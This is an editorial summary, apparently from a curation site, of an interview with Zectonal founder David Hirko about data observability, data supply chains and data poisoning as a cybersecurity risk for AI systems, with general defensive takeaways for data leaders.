David Hirko - AI observability and data as a cybersecurity weakness
Summary
David Hirko, founder of Zectonal, discusses data observability and its critical role in cybersecurity, particularly in the context of AI and machine learning. He highlights the challenge of ensuring data quality and provenance at scale, noting that many organizations assume data legitimacy without proper verification. Hirko defines data observability as the process of monitoring macro (e.g., timeliness, staleness, volume) and micro (e.g., schema consistency, null values) quality trends in data. He introduces the concept of a "data supply chain," emphasizing the need to track data sources from individual sensors through multiple aggregators, akin to traditional manufacturing supply chains. The discussion also covers data poisoning as a cybersecurity threat, exemplified by the Log4Shell vulnerability, where malicious payloads embedded in data files can compromise internal systems, contrasting this with traditional internet-facing attacks. Zectonal's approach involves deep data inspection to detect issues before data enters a data lake, and Hirko anticipates the growing challenge of differentiating real from synthetic data.
Key takeaway
For CTOs and VPs of Data/AI, understanding and implementing robust data observability is no longer optional but a strategic imperative. Your organization's data supply chain is a significant attack surface, and vulnerabilities can be introduced through subtle data poisoning or quality degradation. Prioritize tools and processes that enable deep data inspection and pre-ingestion validation to safeguard your AI models and analytics from compromised data, especially as synthetic data becomes more prevalent.
Key insights
Data observability is crucial for ensuring data quality and security, especially as data becomes a primary attack vector for AI systems.
Principles
- Assume data is not inherently trustworthy.
- Data quality issues often stem from upstream supply chain anomalies.
- Security must be embedded in data observability.
Method
Implement deep data inspection before ingestion into data lakes to prevent the introduction of bad quality or malicious data, monitoring both macro and micro data trends.
In practice
- Scrutinize data provenance from third-party suppliers.
- Conduct deep dives on ETL job failures to identify data anomalies.
- Exercise caution when using untrusted data sources for projects.
Topics
- Data Observability
- Data Cybersecurity
- Data Supply Chain
- Data Poisoning
- Synthetic Data
Best for: CTO, VP of Engineering/Data, Director of AI/ML, Data Scientist, Machine Learning Engineer, AI Security Engineer
Related on AIssential
Editorial summary, takeaway, and curation by AIssential. Original article published by Towards Data Science.